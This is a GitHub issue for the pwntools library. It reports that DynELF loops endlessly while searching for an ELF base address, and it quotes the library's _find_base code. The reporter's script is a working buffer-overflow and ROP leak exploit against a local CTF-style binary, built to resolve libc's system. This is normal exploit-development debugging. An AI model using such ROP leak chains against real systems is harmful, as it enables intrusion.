Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

DynELF cannot break the endless loop in dynelf.py #1418

Open
Kiprey opened this issue Jan 29, 2020 · 1 comment
Open

DynELF cannot break the endless loop in dynelf.py #1418

Kiprey opened this issue Jan 29, 2020 · 1 comment
Labels
mystery This is really suspicious and probably related to something totally unrelated

Comments

@Kiprey
Copy link

Kiprey commented Jan 29, 2020

These are my codes:

from pwn import *
p = process("./pwn1_64")
e = ELF("pwn1_64")

plt_write_addr = e.plt["write"]
start_addr = e.symbols["vulnerable_function"]
pop_rsi_rdx_rdi_addr = 0x40053b

def leak(address):
    payload1 = "a"*136
    payload1 += p64(pop_rsi_rdx_rdi_addr) + p64(address) + p64(4) + p64(1)
    payload1 += p64(plt_write_addr)
    payload1 += p64(start_addr)
    p.sendline(payload1)
    data = p.recv()
    return data

dyn_elf = DynELF(leak, elf=e)
system_addr = dyn_elf.lookup("system", "libc")

When I am executing this code,

dyn_elf = DynELF(leak, elf=e)

Program is stuck.
So I try to debug and get into "dynelf.py", discovering that
in class DynELF -> function _find_base ,

def _find_base(self, ptr):
        page_size = 0x1000
        page_mask = ~(page_size - 1)

        ptr &= page_mask
        w = None

        while True:
            if self.leak.compare(ptr, '\x7fELF'):
                break

            # See if we can short circuit the search
            fast = self._find_base_optimized(ptr)
            if fast:
                ptr = fast
                continue

            ptr -= page_size

            if ptr < 0:
                raise ValueError("Address is negative, something is wrong!")

            # Defer creating the spinner in the event that 'ptr'
            # is already the base address
            w = w or self.waitfor("Finding base address")
            self.status('%#x' % ptr)

        # If we created a spinner, print the success message
        if w:
            self.success('%#x' % ptr)

        return ptr

The condition of breaking the loop has never be met.

I don't know why. But I found something interesting.
When I was debugging, once I tried to run my Python script in console code by code.
I mean, when one line of code was executed in python interpreter, I input the next line of code to the console and waiting the code to be executed, too.

When I input
dyn_elf = DynELF(leak, elf=e)
It ’s no surprise that the program was stuck.
So, I input the ctrl + c to stop this code.

But when I input the same code to try again,
the program didn't stuck at all! But it seems work very bad.

Here is the screeshot.
image
image

I don't know why ,too. But I hope this situation can help you.
This is my pwn file.
pwn1_64.zip
I hope it can help you, too!

My English is a little poor, I hope it didn't disturb you.
@ioxera
Copy link

ioxera commented May 27, 2021

Similar to the above, I encountered a problem in which the dynelf function could not jump out of the loop and cause a memory leak, resulting in the POC process being killed by the system.
My pwntools version is V4.5.0.

@Arusekk Arusekk added the mystery This is really suspicious and probably related to something totally unrelated label May 27, 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
mystery This is really suspicious and probably related to something totally unrelated
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@ioxera @Arusekk @Kiprey